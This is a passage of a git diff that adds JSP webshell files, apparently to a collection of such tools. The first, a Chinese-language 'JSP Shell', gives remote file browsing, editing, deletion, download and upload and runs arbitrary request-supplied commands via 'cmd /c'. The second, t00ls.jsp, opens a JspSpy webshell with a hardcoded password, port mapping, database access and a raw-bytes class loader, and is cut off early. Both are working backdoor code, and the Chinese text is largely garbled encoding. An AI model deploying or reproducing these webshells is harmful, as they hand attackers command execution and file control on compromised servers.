+   else return time<10 ? "0" + time + "s": time + "s";
+  }
+
+ }
+
+ public class FileInfo {
+
+  public String name = null, clientFileName = null, fileContentType = null;
+  private byte[] fileContents = null;
+  public File file = null;
+  public StringBuffer sb = new StringBuffer(100);
+
+  public void setFileContents(byte[] aByteArray) {
+   fileContents = new byte[aByteArray.length];
+   System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+  }
+}
+
+// A Class with methods used to process a ServletInputStream
+public class HttpMultiPartParser {
+
+  private final String lineSeparator = System.getProperty("line.separator", "\n");
+  private final int ONE_MB = 1024 * 1;
+
+  public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+    int clength) throws IllegalArgumentException, IOException {
+   if (is == null) throw new IllegalArgumentException("InputStream");
+   if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+     "\"" + boundary + "\" is an illegal boundary indicator");
+   boundary = "--" + boundary;
+   StringTokenizer stLine = null, stFields = null;
+   FileInfo fileInfo = null;
+   Hashtable dataTable = new Hashtable(5);
+   String line = null, field = null, paramName = null;
+   boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+   boolean isFile = false;
+   if (saveFiles) { // Create the required directory (including parent dirs)
+    File f = new File(saveInDir);
+    f.mkdirs();
+   }
+   line = getLine(is);
+   if (line == null || !line.startsWith(boundary)) throw new IOException(
+     "Boundary not found; boundary = " + boundary + ", line = " + line);
+   while (line != null) {
+    if (line == null || !line.startsWith(boundary)) return dataTable;
+    line = getLine(is);
+    if (line == null) return dataTable;
+    stLine = new StringTokenizer(line, ";\r\n");
+    if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+      "Bad data in second line");
+    line = stLine.nextToken().toLowerCase();
+    if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+      "Bad data in second line");
+    stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+    if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+      "Bad data in second line");
+    fileInfo = new FileInfo();
+    stFields.nextToken();
+    paramName = stFields.nextToken();
+    isFile = false;
+    if (stLine.hasMoreTokens()) {
+     field = stLine.nextToken();
+     stFields = new StringTokenizer(field, "=\"");
+     if (stFields.countTokens() > 1) {
+      if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+       fileInfo.name = paramName;
+       String value = stFields.nextToken();
+       if (value != null && value.trim().length() > 0) {
+        fileInfo.clientFileName = value;
+        isFile = true;
+       }
+       else {
+        line = getLine(is); // Skip "Content-Type:" line
+        line = getLine(is); // Skip blank line
+        line = getLine(is); // Skip blank line
+        line = getLine(is); // Position to boundary line
+        continue;
+       }
+      }
+     }
+     else if (field.toLowerCase().indexOf("filename") >= 0) {
+      line = getLine(is); // Skip "Content-Type:" line
+      line = getLine(is); // Skip blank line
+      line = getLine(is); // Skip blank line
+      line = getLine(is); // Position to boundary line
+      continue;
+     }
+    }
+    boolean skipBlankLine = true;
+    if (isFile) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+     if (line.trim().length() < 1) skipBlankLine = false;
+     else {
+      stLine = new StringTokenizer(line, ": ");
+      if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+        "Bad data in third line");
+      stLine.nextToken(); // Content-Type
+      fileInfo.fileContentType = stLine.nextToken();
+     }
+    }
+if (skipBlankLine) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+    }
+    if (!isFile) {
+     line = getLine(is);
+     if (line == null) return dataTable;
+     dataTable.put(paramName, line);
+     // If parameter is dir, change saveInDir to dir
+     if (paramName.equals("dir")) saveInDir = line;
+     line = getLine(is);
+     continue;
+    }
+    try {
+     UplInfo uplInfo = new UplInfo(clength);
+     UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+     OutputStream os = null;
+     String path = null;
+     if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+       fileInfo.clientFileName));
+     else os = new ByteArrayOutputStream(ONE_MB);
+     boolean readingContent = true;
+     byte previousLine[] = new byte[2 * ONE_MB];
+     byte temp[] = null;
+     byte currentLine[] = new byte[2 * ONE_MB];
+     int read, read3;
+     if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+      line = null;
+      break;
+     }
+     while (readingContent) {
+      if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+       line = null;
+       uplInfo.aborted = true;
+       break;
+      }
+      if (compareBoundary(boundary, currentLine)) {
+       os.write(previousLine, 0, read - 2);
+       line = new String(currentLine, 0, read3);
+       break;
+      }
+      else {
+       os.write(previousLine, 0, read);
+       uplInfo.currSize += read;
+       temp = currentLine;
+       currentLine = previousLine;
+       previousLine = temp;
+       read = read3;
+      }//end else
+     }//end while
+     os.flush();
+     os.close();
+     if (!saveFiles) {
+      ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+      fileInfo.setFileContents(baos.toByteArray());
+     }
+     else fileInfo.file = new File(path);
+     dataTable.put(paramName, fileInfo);
+     uplInfo.currSize = uplInfo.totalSize;
+    }//end try
+    catch (IOException e) {
+     throw e;
+    }
+   }
+   return dataTable;
+  }
+
+  /**
+   * Compares boundary string to byte array
+   */
+  private boolean compareBoundary(String boundary, byte ba[]) {
+   byte b;
+   if (boundary == null || ba == null) return false;
+   for (int i = 0; i < boundary.length(); i++)
+    if ((byte) boundary.charAt(i) != ba[i]) return false;
+   return true;
+  }
+
+  /** Convenience method to read HTTP header lines */
+  private synchronized String getLine(ServletInputStream sis) throws IOException {
+   byte b[] = new byte[1024];
+   int read = sis.readLine(b, 0, b.length), index;
+   String line = null;
+   if (read != -1) {
+    line = new String(b, 0, read);
+    if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+   }
+   return line;
+  }
+
+  public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+   String path = null;
+   if (dir == null || fileName == null) throw new IllegalArgumentException(
+     "dir or fileName is null");
+   int index = fileName.lastIndexOf('/');
+   String name = null;
+   if (index >= 0) name = fileName.substring(index + 1);
+   else name = fileName;
+   index = name.lastIndexOf('\\');
+   if (index >= 0) fileName = name.substring(index + 1);
+   path = dir + File.separator + fileName;
+   if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+   else return path.replace('/', File.separatorChar);
+  }
+} //End of class HttpMultiPartParser
+
+String formatPath(String p)
+{
+ StringBuffer sb=new StringBuffer();
+ for (int i = 0; i < p.length(); i++) 
+ {
+  if(p.charAt(i)=='\\')
+  {
+   sb.append("\\\\");
+  }
+  else
+  {
+   sb.append(p.charAt(i));
+  }
+ }
+ return sb.toString();
+}
+
+ /**
+  * Converts some important chars (int) to the corresponding html string
+  */
+ static String conv2Html(int i) {
+  if (i == '&') return "&amp;";
+  else if (i == '<') return "&lt;";
+  else if (i == '>') return "&gt;";
+  else if (i == '"') return "&quot;";
+  else return "" + (char) i;
+ }
+
+ /**
+  * Converts a normal string to a html conform string
+  */
+ static String htmlEncode(String st) {
+  StringBuffer buf = new StringBuffer();
+  for (int i = 0; i < st.length(); i++) {
+   buf.append(conv2Html(st.charAt(i)));
+  }
+  return buf.toString();
+ }
+String getDrivers()
+/**
+Windowsϵͳ��ȡ�ÿ��õ������߼���
+*/
+{
+ StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
+ File roots[]=File.listRoots();
+ for(int i=0;i<roots.length;i++)
+ {
+  sb.append(" <a href=\"javascript:doForm('','"+roots[i]+"\\','','','1','');\">");
+  sb.append(roots[i]+"</a>&nbsp;");
+ }
+ return sb.toString();
+}
+static String convertFileSize(long filesize)
+{
+ //bug 5.09M ��ʾ5.9M
+ String strUnit="Bytes";
+ String strAfterComma="";
+ int intDivisor=1;
+ if(filesize>=1024*1024)
+ {
+  strUnit = "MB";
+  intDivisor=1024*1024;
+ }
+ else if(filesize>=1024)
+ {
+  strUnit = "KB";
+  intDivisor=1024;
+ }
+ if(intDivisor==1) return filesize + " " + strUnit;
+ strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
+ if(strAfterComma=="") strAfterComma=".0";
+ return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
+}
+%>
+<%
+request.setCharacterEncoding("gb2312");
+String tabID = request.getParameter("tabID");
+String strDir = request.getParameter("path");
+String strAction = request.getParameter("action");
+String strFile = request.getParameter("file");
+String strPath = strDir + "\\" + strFile; 
+String strCmd = request.getParameter("cmd");
+StringBuffer sbEdit=new StringBuffer("");
+StringBuffer sbDown=new StringBuffer("");
+StringBuffer sbCopy=new StringBuffer("");
+StringBuffer sbSaveCopy=new StringBuffer("");
+StringBuffer sbNewFile=new StringBuffer("");
+
+if((tabID==null) || tabID.equals(""))
+{
+ tabID = "1";
+}
+
+if(strDir==null||strDir.length()<1)
+{
+ strDir = request.getRealPath("/");
+}
+
+
+if(strAction!=null && strAction.equals("down"))
+{
+ File f=new File(strPath);
+ if(f.length()==0)
+ {
+  sbDown.append("�ļ���СΪ 0 �ֽڣ��Ͳ������˰�");
+ }
+ else
+ {
+  response.setHeader("content-type","text/html; charset=ISO-8859-1");
+  response.setContentType("APPLICATION/OCTET-STREAM"); 
+  response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\"");
+  FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
+  out.clearBuffer();
+  int i;
+  while ((i=fileInputStream.read()) != -1)
+  {
+   out.write(i); 
+  }
+  fileInputStream.close();
+  out.close();
+ }
+}
+
+if(strAction!=null && strAction.equals("del"))
+{
+ File f=new File(strPath);
+ f.delete();
+}
+
+if(strAction!=null && strAction.equals("edit"))
+{
+ File f=new File(strPath); 
+ BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
+ sbEdit.append("<form name='frmEdit' action='' method='POST'>\r\n");
+ sbEdit.append("<input type=hidden name=action value=save >\r\n");
+ sbEdit.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
+ sbEdit.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
+ sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
+ sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> &nbsp;"+strPath+"\r\n");
+ sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
+ String line="";
+ while((line=br.readLine())!=null)
+ {
+  sbEdit.append(htmlEncode(line)+"\r\n");  
+ }
+   sbEdit.append("</textarea>");
+ sbEdit.append("<input type=hidden name=path value="+strDir+">");
+ sbEdit.append("</form>");
+}
+
+if(strAction!=null && strAction.equals("save"))
+{
+ File f=new File(strPath);
+ BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
+ String strContent=request.getParameter("content");
+ bw.write(strContent);
+ bw.close();
+}
+if(strAction!=null && strAction.equals("copy"))
+{
+ File f=new File(strPath);
+ sbCopy.append("<br><form name='frmCopy' action='' method='POST'>\r\n");
+ sbCopy.append("<input type=hidden name=action value=savecopy >\r\n");
+ sbCopy.append("<input type=hidden name=path value='"+strDir+"' >\r\n");
+ sbCopy.append("<input type=hidden name=file value='"+strFile+"' >\r\n");
+ sbCopy.append("ԭʼ�ļ��� "+strPath+"<p>");
+ sbCopy.append("Ŀ���ļ��� <input type=text name=file2 size=40 value='"+strDir+"'><p>");
+ sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
+ sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p>&nbsp;\r\n");
+ sbCopy.append("</form>");
+}
+if(strAction!=null && strAction.equals("savecopy"))
+{
+ File f=new File(strPath);
+ String strDesFile=request.getParameter("file2");
+ if(strDesFile==null || strDesFile.equals(""))
+ {
+  sbSaveCopy.append("<p><font color=red>Ŀ���ļ�����</font>");
+ }
+ else
+ {
+  File f_des=new File(strDesFile);
+  if(f_des.isFile())
+  {
+   sbSaveCopy.append("<p><font color=red>Ŀ���ļ��Ѵ���,���ܸ��ơ�</font>");
+  }
+  else
+  {
+   String strTmpFile=strDesFile;
+   if(f_des.isDirectory())
+   {
+    if(!strDesFile.endsWith("\\"))
+    {
+     strDesFile=strDesFile+"\\";
+    }
+    strTmpFile=strDesFile+"cqq_"+strFile;
+    }
+   
+   File f_des_copy=new File(strTmpFile);
+   FileInputStream in1=new FileInputStream(f);
+   FileOutputStream out1=new FileOutputStream(f_des_copy);
+   byte[] buffer=new byte[1024];
+   int c;
+   while((c=in1.read(buffer))!=-1)
+   {
+    out1.write(buffer,0,c);
+   }
+   in1.close();
+   out1.close();
+ 
+   sbSaveCopy.append("ԭʼ�ļ� ��"+strPath+"<p>");
+   sbSaveCopy.append("Ŀ���ļ� ��"+strTmpFile+"<p>");
+   sbSaveCopy.append("<font color=red>���Ƴɹ���</font>");   
+  }  
+ } 
+ sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=����>");
+}
+if(strAction!=null && strAction.equals("newFile"))
+{
+ String strF=request.getParameter("fileName");
+ String strType1=request.getParameter("btnNewFile");
+ String strType2=request.getParameter("btnNewDir");
+ String strType="";
+ if(strType1==null)
+ {
+  strType="Dir";
+ }
+ else if(strType2==null)
+ {
+  strType="File";
+ }
+ if(!strType.equals("") && !(strF==null || strF.equals("")))
+ {  
+   File f_new=new File(strF);   
+   if(strType.equals("File") && !f_new.createNewFile())
+    sbNewFile.append(strF+" �ļ�����ʧ��");
+   if(strType.equals("Dir") && !f_new.mkdirs())
+    sbNewFile.append(strF+" Ŀ¼����ʧ��");
+ }
+ else
+ {
+  sbNewFile.append("<p><font color=red>�����ļ���Ŀ¼������</font>");
+ }
+}
+
+if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
+{
+ String tempdir=".";
+ boolean error=false;
+ response.setContentType("text/html");
+ sbNewFile.append("<p><font color=red>�����ļ���Ŀ¼������</font>");
+ HttpMultiPartParser parser = new HttpMultiPartParser();
+
+ int bstart = request.getContentType().lastIndexOf("oundary=");
+ String bound = request.getContentType().substring(bstart + 8);
+ int clength = request.getContentLength();
+ Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
+ if (ht.get("cqqUploadFile") != null)
+ {
+
+  FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
+  File f1 = fi.file;
+  UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
+  if (info != null && info.aborted) 
+  {
+   f1.delete();
+   request.setAttribute("error", "Upload aborted");
+  }
+  else 
+  {
+   String path = (String) ht.get("path");
+   if(path!=null && !path.endsWith("\\")) 
+    path = path + "\\";
+   if (!f1.renameTo(new File(path + f1.getName()))) 
+   {
+    request.setAttribute("error", "Cannot upload file.");
+    error = true;
+    f1.delete();
+   }
+  }
+ }
+}
+%>
+<html>
+<head>
+<style type="text/css">
+td,select,input,body{font-size:9pt;}
+A { TEXT-DECORATION: none }
+
+#tablist{
+padding: 5px 0;
+margin-left: 0;
+margin-bottom: 0;
+margin-top: 0.1em;
+font:9pt;
+}
+
+#tablist li{
+list-style: none;
+display: inline;
+margin: 0;
+}
+
+#tablist li a{
+padding: 3px 0.5em;
+margin-left: 3px;
+border: 1px solid ;
+background: F6F6F6;
+}
+
+#tablist li a:link, #tablist li a:visited{
+color: navy;
+}
+
+#tablist li a.current{
+background: #EAEAFF;
+}
+
+#tabcontentcontainer{
+width: 100%;
+padding: 5px;
+border: 1px solid black;
+}
+
+.tabcontent{
+display:none;
+}
+
+</style>
+
+<script type="text/javascript">
+
+var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
+
+////////Stop editting////////////////
+
+function cascadedstyle(el, cssproperty, csspropertyNS){
+if (el.currentStyle)
+return el.currentStyle[cssproperty]
+else if (window.getComputedStyle){
+var elstyle=window.getComputedStyle(el, "")
+return elstyle.getPropertyValue(csspropertyNS)
+}
+}
+
+var previoustab=""
+
+function expandcontent(cid, aobject){
+if (document.getElementById){
+highlighttab(aobject)
+if (previoustab!="")
+document.getElementById(previoustab).style.display="none"
+document.getElementById(cid).style.display="block"
+previoustab=cid
+if (aobject.blur)
+aobject.blur()
+return false
+}
+else
+return true
+}
+
+function highlighttab(aobject){
+if (typeof tabobjlinks=="undefined")
+collecttablinks()
+for (i=0; i<tabobjlinks.length; i++)
+tabobjlinks[i].style.backgroundColor=initTabcolor
+var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
+aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
+}
+
+function collecttablinks(){
+var tabobj=document.getElementById("tablist")
+tabobjlinks=tabobj.getElementsByTagName("A")
+}
+
+function do_onload(){
+collecttablinks()
+initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
+initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
+expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
+}
+
+if (window.addEventListener)
+window.addEventListener("load", do_onload, false)
+else if (window.attachEvent)
+window.attachEvent("onload", do_onload)
+else if (document.getElementById)
+window.onload=do_onload
+
+ 
+
+</script>
+<script language="javascript">
+
+function doForm(action,path,file,cmd,tab,content)
+{
+ document.frmCqq.action.value=action;
+ document.frmCqq.path.value=path;
+ document.frmCqq.file.value=file;
+ document.frmCqq.cmd.value=cmd;
+ document.frmCqq.tabID.value=tab;
+ document.frmCqq.content.value=content;
+ if(action=="del")
+ {
+  if(confirm("ȷ��Ҫɾ���ļ� "+file+" ��"))
+  document.frmCqq.submit();
+ }
+ else
+ {
+  document.frmCqq.submit();    
+ }
+}
+</script>
+
+<title>JSP Shell ��������ר�ð汾</title>
+<head>
+
+
+<body>
+
+<form name="frmCqq" method="post" action="">
+<input type="hidden" name="action" value="">
+<input type="hidden" name="path" value="">
+<input type="hidden" name="file" value="">
+<input type="hidden" name="cmd" value="">
+<input type="hidden" name="tabID" value="2">
+<input type="hidden" name="content" value="">
+</form>
+
+<!--Top Menu Started-->
+<ul id="tablist">
+<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
+<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
+<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
+<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
+ &nbsp; <%=authorInfo[languageNo]%>
+</ul>
+<!--Top Menu End-->
+
+
+<%
+StringBuffer sbFolder=new StringBuffer("");
+StringBuffer sbFile=new StringBuffer("");
+try
+{
+ File objFile = new File(strDir);
+ File list[] = objFile.listFiles(); 
+ if(objFile.getAbsolutePath().length()>3)
+ {
+  sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
+  sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
+
+
+ }
+ for(int i=0;i<list.length;i++)
+ {
+  if(list[i].isDirectory())
+  {
+   sbFolder.append("<tr><td >&nbsp;</td><td>");
+   sbFolder.append("  <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
+   sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
+  }
+  else
+  {
+      String strLen="";
+   String strDT="";
+   long lFile=0;
+   lFile=list[i].length();
+   strLen = convertFileSize(lFile);
+   Date dt=new Date(list[i].lastModified());
+   strDT=dt.toLocaleString();
+   sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
+   sbFile.append(""+list[i].getName()); 
+   sbFile.append("</td><td>");
+   sbFile.append(""+strLen);
+   sbFile.append("</td><td>");
+   sbFile.append(""+strDT);
+   sbFile.append("</td><td>");
+
+   sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileEdit[languageNo]+"</a> ");
+
+   sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileDel[languageNo]+"</a> ");
+
+   sbFile.append("  &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileDown[languageNo]+"</a> ");
+
+   sbFile.append("  &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
+   sbFile.append(strFileCopy[languageNo]+"</a> ");
+  }  
+
+ } 
+}
+catch(Exception e)
+{
+ out.println("<font color=red>����ʧ�ܣ� "+e.toString()+"</font>");
+}
+%>
+
+<DIV id="tabcontentcontainer">
+
+
+<div id="menu3" class="tabcontent">
+<br> 
+<br> &nbsp;&nbsp; ��
+<br> 
+<br>&nbsp;
+
+</div>
+
+<div id="menu4" class="tabcontent">
+<br>
+<p>һ������˵��</p>
+<p>&nbsp;&nbsp;&nbsp; jsp �汾���ļ���������ͨ���ó������Զ�̹����������ϵ��ļ�ϵͳ���������½����޸ġ�</p>
+<p>ɾ���������ļ���Ŀ¼������windowsϵͳ�����ṩ�������д��ڵĹ��ܣ���������һЩ��������</p>
+<p>��windows��cmd��</p>
+<p>&nbsp;</p>
+<p>��������</p>
+<p>&nbsp;&nbsp;&nbsp;<b>������ʹ�ù����У����κ����⣬������߽��鶼���Ը������ԣ��Ա�ʹ�������������ƺ��ȶ���<p>
+���Ե�ַΪ��<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
+<p>&nbsp;</p>
+<p>�������¼�¼</p>
+<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9���԰淢����������һЩ�����Ĺ��ܣ��ļ��༭�����ơ�ɾ�������ء��ϴ��Լ��½��ļ�Ŀ¼����</p>
+<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; ��ʱ��Ϊ0.6��ɣ� �ṩ��Ŀ¼�ļ�������� �� cmd����</p>
+<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; ��һ��jsp&nbsp;�����������򵥵���ʾĿ¼�ļ���С����</p>
+<p>&nbsp;</p>
+<p>&nbsp;</p>
+</div>
+
+
+<div id="menu1" class="tabcontent">
+<%
+out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"�� <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
+%>
+<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
+       
+        <tr> 
+          <td width="25%" align="center" valign="top"> 
+              <table width="98%" border="0" cellspacing="0" cellpadding="3">
+     <%=sbFolder%>
+                </tr>                 
+              </table>
+          </td>
+          <td width="81%" align="left" valign="top">
+ 
+ <%
+ if(strAction!=null && strAction.equals("edit"))
+ {
+  out.println(sbEdit.toString());
+ }
+ else if(strAction!=null && strAction.equals("copy"))
+ {
+  out.println(sbCopy.toString());
+ }
+ else if(strAction!=null && strAction.equals("down"))
+ {
+  out.println(sbDown.toString());
+ }
+ else if(strAction!=null && strAction.equals("savecopy"))
+ {
+  out.println(sbSaveCopy.toString());
+ }
+ else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
+ {
+  out.println(sbNewFile.toString());
+ }
+ else
+ {
+ %>
+  <span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
+              <tr bgcolor="#E7e7e6"> 
+                <td width="26%"><%=strFileName[languageNo]%></td>
+                <td width="19%"><%=strFileSize[languageNo]%></td>
+                <td width="29%"><%=strLastModified[languageNo]%></td>
+                <td width="26%"><%=strFileOperation[languageNo]%></td>
+              </tr>              
+            <%=sbFile%>
+             <!-- <tr align="center"> 
+                <td colspan="4"><br>
+                  �ܼ��ļ�������<font color="#FF0000">30</font> ����С��<font color="#FF0000">664.9</font> 
+                  KB </td>
+              </tr>
+    -->
+            </table>
+   </span>
+ <%
+ }  
+ %>
+
+          </td>
+        </tr>
+
+ <form name="frmMake" action="" method="post">
+ <tr><td colspan=2 bgcolor=#FBFFC6>
+ <input type="hidden" name="action" value="newFile">
+ <input type="hidden" name="path" value="<%=strDir%>">
+ <input type="hidden" name="file" value="<%=strFile%>">
+ <input type="hidden" name="cmd" value="<%=strCmd%>">
+ <input type="hidden" name="tabID" value="1">
+ <input type="hidden" name="content" value="">
+ <%
+ if(!strDir.endsWith("\\"))
+ strDir = strDir + "\\";
+ %>
+ <input type="text" name="fileName" size=36 value="<%=strDir%>">
+ <input type="submit" name="btnNewFile" value="�½��ļ�" onclick="frmMake.submit()" > 
+ <input type="submit" name="btnNewDir" value="�½�Ŀ¼"  onclick="frmMake.submit()" > 
+ </form>  
+ <form name="frmUpload" enctype="multipart/form-data" action="" method="post">
+ <input type="hidden" name="action" value="upload">
+ <input type="hidden" name="path" value="<%=strDir%>">
+ <input type="hidden" name="file" value="<%=strFile%>">
+ <input type="hidden" name="cmd" value="<%=strCmd%>">
+ <input type="hidden" name="tabID" value="1">
+ <input type="hidden" name="content" value="">
+ <input type="file" name="cqqUploadFile" size="36">
+ <input type="submit" name="submit" value="�ϴ�">
+ </td></tr></form>
+      </table>
+</div>
+<div id="menu2" class="tabcontent">
+
+<%
+String line="";
+StringBuffer sbCmd=new StringBuffer("");
+
+if(strCmd!=null) 
+{
+ try
+ {
+  //out.println(strCmd);
+  Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
+  BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
+  while((line=br.readLine())!=null)
+  {
+   sbCmd.append(line+"\r\n");  
+  }    
+ }
+ catch(Exception e)
+ {
+  System.out.println(e.toString());
+ }
+}
+else
+{
+ strCmd = "set";
+}
+
+%>
+<form name="cmd" action="" method="post">
+&nbsp;
+<input type="text" name="cmd" value="<%=strCmd%>" size=50>
+<input type="hidden" name="tabID" value="2">
+<input type=submit name=submit value="<%=strExecute[languageNo]%>">
+</form>
+<%
+if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
+{
+%>
+&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
+<br>&nbsp;
+<%
+}
+%>
+</DIV>
+</div>
+<br><br>
+<center><a href="http://www.syue.com" target="_blank">����</a> 
+<br>
\ No newline at end of file
diff --git a/jsp/t00ls.jsp b/jsp/t00ls.jsp
new file mode 100644
index 0000000..39b6d88
--- /dev/null
+++ b/jsp/t00ls.jsp
@@ -0,0 +1,3294 @@
+<%@page pageEncoding="utf-8"%>
+<%@page import="java.io.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.util.regex.*"%>
+<%@page import="java.sql.*"%>
+<%@page import="java.lang.reflect.*"%>
+<%@page import="java.nio.charset.*"%>
+<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
+<%@page import="java.text.*"%>
+<%@page import="java.net.*"%>
+<%@page import="java.util.zip.*"%>
+<%@page import="java.util.jar.*"%>
+<%@page import="java.awt.*"%>
+<%@page import="java.awt.image.*"%>
+<%@page import="javax.imageio.*"%>
+<%@page import="java.awt.datatransfer.DataFlavor"%>
+<%@page import="java.util.prefs.Preferences"%>
+<%!
+	private static final String PW = "icesword"; //password
+	private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
+	private static final String REQUEST_CHARSET = "ISO-8859-1";
+	private static final String PAGE_CHARSET = "UTF-8";
+	private static final String CURRENT_DIR = "currentdir";
+	private static final String MSG = "SHOWMSG";
+	private static final String PORT_MAP = "PMSA";
+	private static final String DBO = "DBO";
+	private static final String SHELL_ONLINE = "SHELL_ONLINE";
+	private static final String ENTER = "ENTER_FILE";
+	private static final String ENTER_MSG = "ENTER_FILE_MSG";
+	private static final String ENTER_CURRENT_DIR  = "ENTER_CURRENT_DIR";
+	private static final String SESSION_O = "SESSION_O";
+	private static String SHELL_NAME = "";
+	private static String WEB_ROOT = null; 
+	private static String SHELL_DIR = null;
+	public static Map ins = new HashMap();
+	private static boolean ISLINUX = false;
+	
+	private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout.";
+	private static final String BACK_HREF = " <a href='javascript:history.back()'>Back</a>";
+	
+	private static class MyRequest extends HttpServletRequestWrapper {
+		public MyRequest(HttpServletRequest req) {
+			super(req);
+		}
+		public String getParameter(String name) {
+			try {
+				String value = super.getParameter(name);
+				if (name == null)
+					return null;
+				return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
+			} catch (Exception e) {
+				return null;
+			}
+		}
+	}
+	private static class SpyClassLoader extends ClassLoader{
+		public SpyClassLoader() {
+		}
+		public Class defineClass(String name,byte[] b) {
+			return super.defineClass(name,b,0,b.length - 2);
+		}
+	}
+	private static class DBOperator{
+		private Connection conn = null;
+		private Statement stmt = null;
+		private String driver;
+		private String url;
+		private String uid;
+		private String pwd;
+		public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
+			this(driver,url,uid,pwd,false);
+		}
+		public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
+			Class.forName(driver);
+			if (connect)
+				this.conn = DriverManager.getConnection(url,uid,pwd);
+			this.url = url;
+			this.driver = driver;
+			this.uid = uid;
+			this.pwd = pwd;
+		}
+		public void connect() throws Exception{
